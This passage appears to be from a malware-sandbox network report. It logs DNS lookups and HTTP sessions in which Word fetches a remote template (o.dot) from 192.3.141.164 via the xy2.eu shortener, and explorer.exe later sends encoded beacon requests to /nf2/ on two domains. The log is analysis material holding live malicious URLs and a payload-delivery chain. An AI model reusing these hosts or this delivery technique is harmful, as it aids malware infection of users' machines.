Jun 11, 2021 15:59:44.765516996 CEST	61865	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:59:44.824865103 CEST	53	61865	8.8.8.8	192.168.2.22
Jun 11, 2021 15:59:44.831671953 CEST	55171	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:59:44.891972065 CEST	53	55171	8.8.8.8	192.168.2.22
Jun 11, 2021 16:00:09.961067915 CEST	52496	53	192.168.2.22	8.8.8.8
Jun 11, 2021 16:00:10.023241997 CEST	53	52496	8.8.8.8	192.168.2.22
Jun 11, 2021 16:00:10.029587984 CEST	57564	53	192.168.2.22	8.8.8.8
Jun 11, 2021 16:00:10.088385105 CEST	53	57564	8.8.8.8	192.168.2.22
Jun 11, 2021 16:00:57.366019011 CEST	63009	53	192.168.2.22	8.8.8.8
Jun 11, 2021 16:00:57.473084927 CEST	53	63009	8.8.8.8	192.168.2.22
Jun 11, 2021 16:01:16.129654884 CEST	59319	53	192.168.2.22	8.8.8.8
Jun 11, 2021 16:01:16.194014072 CEST	53	59319	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 11, 2021 15:58:37.836935997 CEST	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:38.804543018 CEST	192.168.2.22	8.8.8.8	0x437e	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:38.878484964 CEST	192.168.2.22	8.8.8.8	0xb648	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:54.606431007 CEST	192.168.2.22	8.8.8.8	0x82b3	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:54.666312933 CEST	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:10.201064110 CEST	192.168.2.22	8.8.8.8	0x85bf	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:10.271451950 CEST	192.168.2.22	8.8.8.8	0xd7b1	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:44.765516996 CEST	192.168.2.22	8.8.8.8	0x6ef9	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:44.831671953 CEST	192.168.2.22	8.8.8.8	0x3690	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 16:00:09.961067915 CEST	192.168.2.22	8.8.8.8	0x21e1	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 16:00:10.029587984 CEST	192.168.2.22	8.8.8.8	0x6365	Standard query (0)	xy2.eu	A (IP address)	IN (0x0001)
Jun 11, 2021 16:00:57.366019011 CEST	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.loundxgroup.com	A (IP address)	IN (0x0001)
Jun 11, 2021 16:01:16.129654884 CEST	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.grandcanyonbean.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 11, 2021 15:58:37.898869038 CEST	8.8.8.8	192.168.2.22	0x26d4	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:38.863776922 CEST	8.8.8.8	192.168.2.22	0x437e	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:38.938132048 CEST	8.8.8.8	192.168.2.22	0xb648	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:54.659356117 CEST	8.8.8.8	192.168.2.22	0x82b3	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:58:54.768090010 CEST	8.8.8.8	192.168.2.22	0x71dd	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:10.260344028 CEST	8.8.8.8	192.168.2.22	0x85bf	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:10.334002018 CEST	8.8.8.8	192.168.2.22	0xd7b1	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:44.824865103 CEST	8.8.8.8	192.168.2.22	0x6ef9	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 15:59:44.891972065 CEST	8.8.8.8	192.168.2.22	0x3690	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 16:00:10.023241997 CEST	8.8.8.8	192.168.2.22	0x21e1	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 16:00:10.088385105 CEST	8.8.8.8	192.168.2.22	0x6365	No error (0)	xy2.eu		93.157.97.6	A (IP address)	IN (0x0001)
Jun 11, 2021 16:00:57.473084927 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.loundxgroup.com		91.227.139.235	A (IP address)	IN (0x0001)
Jun 11, 2021 16:01:16.194014072 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.grandcanyonbean.com	grandcanyonbean.com		CNAME (Canonical name)	IN (0x0001)
Jun 11, 2021 16:01:16.194014072 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	grandcanyonbean.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

xy2.eu

192.3.141.164

www.loundxgroup.com

www.grandcanyonbean.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:58:37.986566067 CEST	0	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: xy2.eu Content-Length: 0 Connection: Keep-Alive
Jun 11, 2021 15:58:38.348437071 CEST	1	IN	HTTP/1.1 200 OK date: Fri, 11 Jun 2021 13:58:38 GMT server: Apache x-powered-by: PHP/5.5.38 cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:58:38 GMT vary: Accept-Encoding transfer-encoding: chunked content-type: text/html Data Raw: 31 46 43 33 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 61 74 61 2d 61 64 2d 63 6c 69 65 6e 74 3d 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 20 73 72 63 3d 22 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 6a 73 2f 61 64 73 62 79 67 6f 6f 67 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 28 61 64 73 62 79 67 6f 6f 67 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 61 64 73 62 79 67 6f 6f 67 6c 65 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 5f 61 64 5f 63 6c 69 65 6e 74 3a 20 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 65 6e 61 62 6c 65 5f 70 61 67 65 5f 6c 65 76 65 6c 5f 61 64 73 3a 20 74 72 75 65 0d 0a 20 20 20 20 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 36 38 37 32 35 35 38 2d 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 0d 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 36 38 37 32 35 35 38 2d 37 27 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 2c 20 74 69 6e 79 2c 20 75 72 6c 2c 20 63 6f 6d 70 72 65 73 73 2c 20 6c 69 6e 6b 2c 20 62 69 74 6c 79 2c 20 73 68 61 72 65 2c 20 73 68 6f 72 74 65 6e 2c 20 73 61 76 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 20 74 6f 20 58 59 32 2e 65 75 20 2d 20 44 6f 20 79 6f 75 20 68 61 76 65 20 65 6e 6f 75 67 68 20 6f 66 20 70 6f 73 74 69 6e 67 20 55 52 4c 73 20 69 6e 20 65 6d 61 69 6c 73 20 6f 6e 6c 79 20 74 6f 20 68 61 76 65 20 69 74 20 62 72 65 61 6b 20 77 68 65 6e 20 73 65 6e 74 20 63 61 75 73 69 6e 67 20 74 68 65 20 Data Ascii: 1FC3<!DOCTYPE html ><head><script async data-ad-client="ca-pub-2614556310778759" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script> (adsbygoogle = window.adsbygoogle \|\| []).push({ google_ad_client: "ca-pub-2614556310778759", enable_page_level_ads: true });</script> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-36872558-7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-36872558-7'); </script> <meta charset="UTF-8"> <meta name="robots" content="index, follow"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="keywords" content="short, tiny, url, compress, link, bitly, share, shorten, save"> <meta name="description" content="Welcome to XY2.eu - Do you have enough of posting URLs in emails only to have it break when sent causing the
Jun 11, 2021 15:58:38.348500967 CEST	3	IN	Data Raw: 72 65 63 69 70 69 65 6e 74 20 74 6f 20 68 61 76 65 20 74 6f 20 63 75 74 20 61 6e 64 20 70 61 73 74 65 20 69 74 20 62 61 63 6b 20 74 6f 67 65 74 68 65 72 3f 20 57 65 20 77 69 6c 6c 20 63 72 65 61 74 65 20 61 20 74 69 6e 79 20 55 52 4c 20 74 68 61 Data Ascii: recipient to have to cut and paste it back together? We will create a tiny URL that will not break in email postings and never expires. Our site is also mobile friendly!"> <meta name="viewport" content="width=device-width, initial-scale=1">
Jun 11, 2021 15:58:38.348541975 CEST	4	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <link rel="shortcut icon" href="/gfx/favicon.png"> <link rel="stylesheet" href="/css/style.css"> <link href="https://fonts.googleapis.com/css?family=Courgette%7CAcme%7CMontserrat&subset=latin-ext" rel="stylesheet"> ... Counter
Jun 11, 2021 15:58:38.348582029 CEST	6	IN	Data Raw: 2f 2f 74 69 6e 79 75 72 6c 2e 6d 6f 62 69 22 3e 54 69 6e 79 55 52 4c 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 72 74 2d 77 72 61 70 70 65 72 2d 62 61 63 6b 67 72 6f 75 6e Data Ascii: //tinyurl.mobi">TinyURL</a></div></div><div class="short-wrapper-background" style="text-align: center"><div class="short-wrapper"><div class="container" style="background-color: transparent; padding-top: 60px; padding-bottom: 60px
Jun 11, 2021 15:58:38.348630905 CEST	7	IN	Data Raw: 58 59 32 2e 65 75 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: XY2.eu</b></div><div style="padding-bottom: 15px; font-style: italic; font-size: 14px" class="text">*No PayPal account required</div><form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"><input type="hidden" na
Jun 11, 2021 15:58:38.348675966 CEST	8	IN	Data Raw: 20 79 6f 75 72 20 6c 69 6e 6b 73 20 74 6f 6f 6c 62 61 72 2e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 22 3e 3c 62 3e 3c 61 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 Data Ascii: your links toolbar.</div><div style="padding: 10px;"><b><a style="font-size: 22px;" href="javascript:void(location.href='http://xy2.eu/create.php?url='+encodeURIComponent(location.href))">XY2.eu</a></b></div><div class="text">By clicking
Jun 11, 2021 15:58:38.348707914 CEST	9	IN	Data Raw: 20 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 Data Ascii: </b></div><a target="_blank" href="https://play.google.com/store/apps/details?id=com.myportal.URLShortener"><img src="/gfx/qr-app.png" alt="Scan this QR code with your mobile device"/></a></div>...<div class="container" style="text-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:58:39.008294106 CEST	10	OUT	HEAD /e9yj HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: xy2.eu
Jun 11, 2021 15:58:39.075773001 CEST	10	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:58:39 GMT server: Apache location: http://xy2.eu/?redirect=e9yj cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:58:39 GMT content-type: text/html; charset=iso-8859-1
Jun 11, 2021 15:58:39.076772928 CEST	10	OUT	HEAD /?redirect=e9yj HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: xy2.eu
Jun 11, 2021 15:58:39.147640944 CEST	10	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:58:39 GMT server: Apache x-powered-by: PHP/5.5.38 location: http://192.3.141.164/oti/o.dot cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:58:39 GMT content-type: text/html
Jun 11, 2021 15:58:39.413681984 CEST	11	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:58:39 GMT server: Apache x-powered-by: PHP/5.5.38 location: http://192.3.141.164/oti/o.dot cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:58:39 GMT content-type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49177	91.227.139.235	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 16:00:57.622942924 CEST	1063	OUT	GET /nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1 Host: www.loundxgroup.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 11, 2021 16:00:57.695300102 CEST	1064	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Fri, 11 Jun 2021 14:00:57 GMT Content-Type: text/html Content-Length: 169 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.22	49178	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 16:01:16.242110014 CEST	1065	OUT	GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1 Host: www.grandcanyonbean.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 11, 2021 16:01:16.380748034 CEST	1065	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 11 Jun 2021 14:01:16 GMT Content-Type: text/html Content-Length: 275 ETag: "60c03ab8-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	192.3.141.164	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:58:39.291786909 CEST	11	OUT	HEAD /oti/o.dot HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 192.3.141.164
Jun 11, 2021 15:58:39.434138060 CEST	11	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 13:58:39 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 Last-Modified: Fri, 11 Jun 2021 07:49:12 GMT ETag: "2ec2-5c478be5aba60" Accept-Ranges: bytes Content-Length: 11970 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:58:54.837615013 CEST	13	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: xy2.eu
Jun 11, 2021 15:58:55.071278095 CEST	14	IN	HTTP/1.1 200 OK date: Fri, 11 Jun 2021 13:58:54 GMT server: Apache x-powered-by: PHP/5.5.38 cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:58:54 GMT vary: Accept-Encoding transfer-encoding: chunked content-type: text/html Data Raw: 31 46 43 33 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 61 74 61 2d 61 64 2d 63 6c 69 65 6e 74 3d 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 20 73 72 63 3d 22 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 6a 73 2f 61 64 73 62 79 67 6f 6f 67 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 28 61 64 73 62 79 67 6f 6f 67 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 61 64 73 62 79 67 6f 6f 67 6c 65 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 5f 61 64 5f 63 6c 69 65 6e 74 3a 20 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 65 6e 61 62 6c 65 5f 70 61 67 65 5f 6c 65 76 65 6c 5f 61 64 73 3a 20 74 72 75 65 0d 0a 20 20 20 20 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 36 38 37 32 35 35 38 2d 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 0d 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 36 38 37 32 35 35 38 2d 37 27 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 2c 20 74 69 6e 79 2c 20 75 72 6c 2c 20 63 6f 6d 70 72 65 73 73 2c 20 6c 69 6e 6b 2c 20 62 69 74 6c 79 2c 20 73 68 61 72 65 2c 20 73 68 6f 72 74 65 6e 2c 20 73 61 76 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 20 74 6f 20 58 59 32 2e 65 75 20 2d 20 44 6f 20 79 6f 75 20 68 61 76 65 20 65 6e 6f 75 67 68 20 6f 66 20 70 6f 73 74 69 6e 67 20 55 52 4c 73 20 69 6e 20 65 6d 61 69 6c 73 20 6f 6e 6c 79 20 74 6f 20 68 61 76 65 20 69 74 20 62 72 65 61 6b 20 77 68 65 6e 20 73 65 6e 74 20 63 61 75 73 69 6e 67 20 74 68 65 20 Data Ascii: 1FC3<!DOCTYPE html ><head><script async data-ad-client="ca-pub-2614556310778759" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script> (adsbygoogle = window.adsbygoogle \|\| []).push({ google_ad_client: "ca-pub-2614556310778759", enable_page_level_ads: true });</script> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-36872558-7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-36872558-7'); </script> <meta charset="UTF-8"> <meta name="robots" content="index, follow"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="keywords" content="short, tiny, url, compress, link, bitly, share, shorten, save"> <meta name="description" content="Welcome to XY2.eu - Do you have enough of posting URLs in emails only to have it break when sent causing the
